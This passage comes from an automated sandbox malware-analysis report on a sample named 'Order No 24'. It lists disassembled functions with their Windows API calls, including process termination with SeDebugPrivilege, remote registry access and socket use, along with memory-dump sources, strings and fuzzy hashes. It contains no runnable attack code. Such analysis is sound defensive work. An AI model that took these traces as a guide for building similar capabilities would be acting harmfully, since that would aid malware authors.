                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,009BB2D4,00000000,00000000,00000000), ref: 009BB2C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                  • Opcode ID: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
                                                                                                                                  • Instruction ID: 31020f3042f2fdbc373eddddb7f748561f14ba9f3c89e307d809d151b74758ac
                                                                                                                                  • Opcode Fuzzy Hash: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
                                                                                                                                  • Instruction Fuzzy Hash: 2A01BBB6240308BFE710EBE5DD49F6B7BACEB88711F018411FA05DB1A1CA749802CB61
                                                                                                                                  Function 009DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                  • Opcode ID: 7f22cff4c8cc026772d175ae737eb04e55e309018669c2225a920edb6eb35a82
                                                                                                                                  • Instruction ID: 8397b9a8a2c9a8fce3a7256cb3eb8afc7a77a89aec7cc780ac4de76e06628974
                                                                                                                                  • Opcode Fuzzy Hash: 7f22cff4c8cc026772d175ae737eb04e55e309018669c2225a920edb6eb35a82
                                                                                                                                  • Instruction Fuzzy Hash: 3CE1C2B1A4021AABDF14DFA4D981FAE77B9EF48354F14842AF905AB380D770ED41CB90
                                                                                                                                  Function 009DBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 1153735e550e8fde05c45c8c5500ce6690f4694ef66ea28484fc0ad7ea5acdaf
                                                                                                                                  • Instruction ID: 4349d4da6c573064ff3c9d4f3426c056703b67a81484ba3b70dec8f396e41800
                                                                                                                                  • Opcode Fuzzy Hash: 1153735e550e8fde05c45c8c5500ce6690f4694ef66ea28484fc0ad7ea5acdaf
                                                                                                                                  • Instruction Fuzzy Hash: 6A919E71A40219EBDF24CFA5C844FAEBBB9EF85710F11855AF505AB280DB749941CFA0
                                                                                                                                  Function 009E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009E9B19
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 009E9B2D
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009E9B47
                                                                                                                                  • _wcscat.LIBCMT ref: 009E9BA2
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 009E9BB9
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009E9BE7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  • Opcode ID: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                                                                                                                  • Instruction ID: d50acce381fc209e95af265dedd4b76845e69290582d2dab57767ae7d991e29b
                                                                                                                                  • Opcode Fuzzy Hash: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                                                                                                                  • Instruction Fuzzy Hash: 15419071900348EBDB22DFA4DC85BEE77B8EF48350F10482AF589A7291D7759D85CB60
                                                                                                                                  Function 009E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                                                                                                                    • Part of subcall function 009C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                                                                                                                    • Part of subcall function 009C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E179A
                                                                                                                                  • GetLastError.KERNEL32 ref: 009E17AD
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E17D9
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009E1855
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 009E1860
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009E1895
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  • Opcode ID: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                                                                                                                  • Instruction ID: ecdf50793a531a20f9ba0b25cadc33fd148a388ac0d94921987edecea63c5583
                                                                                                                                  • Opcode Fuzzy Hash: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                                                                                                                  • Instruction Fuzzy Hash: 0441AE72A00200AFDB06EF99C8A5F6DB7A5AF84710F04849DF9069F2C2DB75ED41CB51
                                                                                                                                  Function 009C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 009C58B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  • Opcode ID: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                                                                                                                  • Instruction ID: cab46ae07622c2b727640e84aeda89b1d16d93b86569b3d8a700c264bd064c61
                                                                                                                                  • Opcode Fuzzy Hash: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                                                                                                                  • Instruction Fuzzy Hash: 77110D36A0DB47BFFB015B549C82F6B639CAF55320F21043EF500F52C1E764BA8042A6
                                                                                                                                  Function 009CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 009CA806
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  • Opcode ID: ac8e34b446f5799adf200077c6876fdd58eb39a2bf07ec9e8ba5bcc224cf9833
                                                                                                                                  • Instruction ID: 8cb7b512a20c83b57548d262bcf59e7d6dea98854274f52ae7256b7bd0e0a496
                                                                                                                                  • Opcode Fuzzy Hash: ac8e34b446f5799adf200077c6876fdd58eb39a2bf07ec9e8ba5bcc224cf9833
                                                                                                                                  • Instruction Fuzzy Hash: ABC17A75E0020E9FDB00CF98D495BAEB7B5FF08319F20446DE606E7291D735AA42CB92
                                                                                                                                  Function 009C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009C6B63
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009C6B6A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009C6B80
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009C6B87
                                                                                                                                  • _wprintf.LIBCMT ref: 009C6BAD
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C6BCB
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 009C6BA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  • Opcode ID: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                                                                                                                  • Instruction ID: 01fe5eea6a5d38b7dbe661ebc191e3a768598b8aa1fdd5faf3a8cd719bd91096
                                                                                                                                  • Opcode Fuzzy Hash: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                                                                                                                  • Instruction Fuzzy Hash: 340112F790021C7FEB11E7E49D89EE6766CD704304F0045A5B745D6041EA749E868B71
                                                                                                                                  Function 009E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2BF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2595220575-0
                                                                                                                                  • Opcode ID: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                                                                                                                  • Instruction ID: a028529b5b0cd376f56c4b954e2e9e865edb54bd0f3fd69c873deb3773e23e9b
                                                                                                                                  • Opcode Fuzzy Hash: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                                                                                                                  • Instruction Fuzzy Hash: 88917C71604241AFCB01EF55C891B6EB7E9FF88310F14885DF99A972A1DB34ED45CB42
                                                                                                                                  Function 009D95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • select.WSOCK32 ref: 009D9691
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D969E
                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009D96C8
                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009D96E9
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D96F8
                                                                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 009D97AA
                                                                                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00A1DC00), ref: 009D9765
                                                                                                                                    • Part of subcall function 009BD2FF: _strlen.LIBCMT ref: 009BD309
                                                                                                                                  • _strlen.LIBCMT ref: 009D9800
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3480843537-0
                                                                                                                                  • Opcode ID: c9836f8c00615395e6c781c40f089ac8f18aa7c4b966ab38d3ee30457647c944
                                                                                                                                  • Instruction ID: 01164fae0ee1afd8abdf630a12cf06eade05cd14a78223aba733d1433a6c3057
                                                                                                                                  • Opcode Fuzzy Hash: c9836f8c00615395e6c781c40f089ac8f18aa7c4b966ab38d3ee30457647c944
                                                                                                                                  • Instruction Fuzzy Hash: AD819B72504240ABC714EFA4CC85F6BBBA9EFC5714F108A1EF5559B291EB30D905CBA2
                                                                                                                                  Function 009AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 009AA991
                                                                                                                                    • Part of subcall function 009A7D7C: __FF_MSGBANNER.LIBCMT ref: 009A7D91
                                                                                                                                    • Part of subcall function 009A7D7C: __NMSG_WRITE.LIBCMT ref: 009A7D98
                                                                                                                                    • Part of subcall function 009A7D7C: __malloc_crt.LIBCMT ref: 009A7DB8
                                                                                                                                  • __lock.LIBCMT ref: 009AA9A4
                                                                                                                                  • __lock.LIBCMT ref: 009AA9F0
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA0C
                                                                                                                                  • EnterCriticalSection.KERNEL32(8000000C,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA29
                                                                                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 009AAA39
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                  • Opcode ID: 6b50c67d1937bc8e8835613ab3c940c1da684169f94abd58c2a971cb6cd1a4d5
                                                                                                                                  • Instruction ID: d7ee2861e1e5154355baaf1c7515f396b10b5283edd35cbf7b96a71b19dc32f7
                                                                                                                                  • Opcode Fuzzy Hash: 6b50c67d1937bc8e8835613ab3c940c1da684169f94abd58c2a971cb6cd1a4d5
                                                                                                                                  • Instruction Fuzzy Hash: 33416775A007069BEB10CFA8CA4579CB7F5AF83334F248318E525AB2D2D7749802CBD2
                                                                                                                                  Function 009E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009E8EE4
                                                                                                                                  • GetDC.USER32(00000000), ref: 009E8EEC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E8EF7
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009E8F03
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 009E8F3F
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009E8F50
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 009E8F8A
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009E8FAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                                                                                                                  • Instruction ID: 514649884d9c020b17ca4c8c35eab011a5939eebea58e2c5c21904e7f8a5f0b0
                                                                                                                                  • Opcode Fuzzy Hash: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                                                                                                                  • Instruction Fuzzy Hash: C4315C72100254BFEB118F95CC89FAB3BAEEB49715F044065FE099A191CA759C42CBB0
                                                                                                                                  Function 009D16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • _wcstok.LIBCMT ref: 009D184E
                                                                                                                                  • _wcscpy.LIBCMT ref: 009D18DD
                                                                                                                                  • _memset.LIBCMT ref: 009D1910
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                  • Opcode ID: ae89dcf22d50251a14696deb725b6a484ec653de7c93df544aea8545add8ae80
                                                                                                                                  • Instruction ID: b13eaa7cc2f58a7e1ec38334f2c466f56ab6964dd97be3b5ffd6afcc9c800629
                                                                                                                                  • Opcode Fuzzy Hash: ae89dcf22d50251a14696deb725b6a484ec653de7c93df544aea8545add8ae80
                                                                                                                                  • Instruction Fuzzy Hash: 80C18075608341AFC714EF64C995B5AB7E4BF85350F00892EF89A973A2DB30ED05CB82
                                                                                                                                  Function 009F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 009F016D
                                                                                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009F038D
                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009F03AB
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009F03D6
                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009F03FF
                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 009F0421
                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 009F0440
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
